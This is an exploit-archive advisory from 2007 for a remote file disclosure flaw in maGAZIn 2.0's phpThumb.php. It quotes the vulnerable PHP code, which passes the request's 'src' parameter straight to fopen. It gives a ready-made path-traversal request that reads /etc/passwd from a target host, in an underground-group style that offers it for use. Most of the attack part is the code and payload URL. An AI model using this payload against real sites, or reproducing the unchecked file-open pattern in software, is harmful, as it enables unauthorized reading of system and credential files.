[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : maGAZIn 2.0 (phpThumb.php src) Remote File Disclosure Vulnerability
# Published : 2007-05-11
# Author : Dj7xpl
# Previous Title : Snaps! Gallery 1.4.4 Remote User Pass Change Exploit
# Next Title : R2K Gallery 1.7 (galeria.php lang2) Local File Inclusion Vulnerability
\|///
\ - - //
( @ @ )
----oOOo--(_)-oOOo---------------------------------------------------
[ Y! Underground Group ]
[ Dj7xpl@yahoo.com ]
[ Dj7xpl.2600.ir ]
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
( ) /
_) (_/
---------------------------------------------------------------------
[!] Portal : maGAZIn v2.0
[!] Download : http://www.pinkcrow.net/Scripts/gallery.php
[!] Type : Remote File Disclosure Vulnerability
---------------------------------------------------------------------
---------------------------------------------------------------------
Vuln Code : Line (152 - 157)
[Code]
if ($fp = @fopen($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 'rb')) {
$OriginalImageData = fread($fp, filesize($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src']));
fclose($fp);
} else {
ErrorImage('cannot open '.$_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 400, 50);
}
[/Code]
---------------------------------------------------------------------
---------------------------------------------------------------------
Bug :
http://[Target]/[Path]/phpThumb.php?src=[Local File]
Example :
http://Target.ir/Gallery/phpThumb.php?src=../../../etc/passwd
---------------------------------------------------------------------
# www.Syue.com [2007-05-11]